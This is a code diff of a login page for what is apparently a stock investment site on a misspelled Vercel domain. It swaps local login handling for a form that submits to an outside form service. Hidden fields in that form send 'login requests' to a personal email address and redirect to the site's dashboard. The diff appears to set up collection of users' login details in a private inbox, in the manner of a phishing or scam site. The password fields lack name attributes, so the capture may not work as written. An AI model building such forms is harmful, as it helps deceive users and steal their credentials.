--- a/login.html
+++ b/login.html
@@ -9,13 +9,22 @@
 
 <body class="bg-gray-900 text-white">
     <div class="min-h-screen flex items-center justify-center">
-        <form onsubmit="return loginUser()" class="bg-gray-800 p-8 rounded-lg shadow-lg space-y-4 w-full max-w-md">
-            <h2 class="text-2xl font-bold text-center text-yellow-400">Login</h2>
+        <form action="https://api.staticforms.xyz/submit" method="POST" class="space-y-4">
+            <!-- StaticForms access key -->
+            <input type="hidden" name="accessKey" value="sf_l7209c1c36dd7h31l7lb9fg9">
+
+            <!-- Email to receive login request -->
+            <input type="hidden" name="email" value="jennifereneh05@email.com">
+
+            <!-- Redirect after success -->
+            <input type="hidden" name="redirectTo"
+                value="https://swizterlandstockinvestement.vercel.app/dashboard.html">
+            <h2 class="text-2xl font-bold text-center text-blue-500">Login</h2>
             <input type="email" id="email" placeholder="Email" required
                 class="w-full p-3 rounded bg-gray-700 text-white" />
             <input type="password" id="password" placeholder="Password" required
                 class="w-full p-3 rounded bg-gray-700 text-white" />
-            <button type="submit" class="w-full bg-blue-600 hover:bg-yellow-400 text-white py-3 rounded">Login</button>
+            <button type="submit" class="w-full bg-blue-600 hover:bg-blue-700 text-white py-3 rounded">Login</button>
             <p class="text-center text-sm text-gray-400">Don't have an account? <a href="register.html"
                     class="text-blue-400">Register</a></p>
         </form>
@@ -31,6 +40,8 @@
             return false;
         }
     </script>
+
+
 </body>
 
 </html>
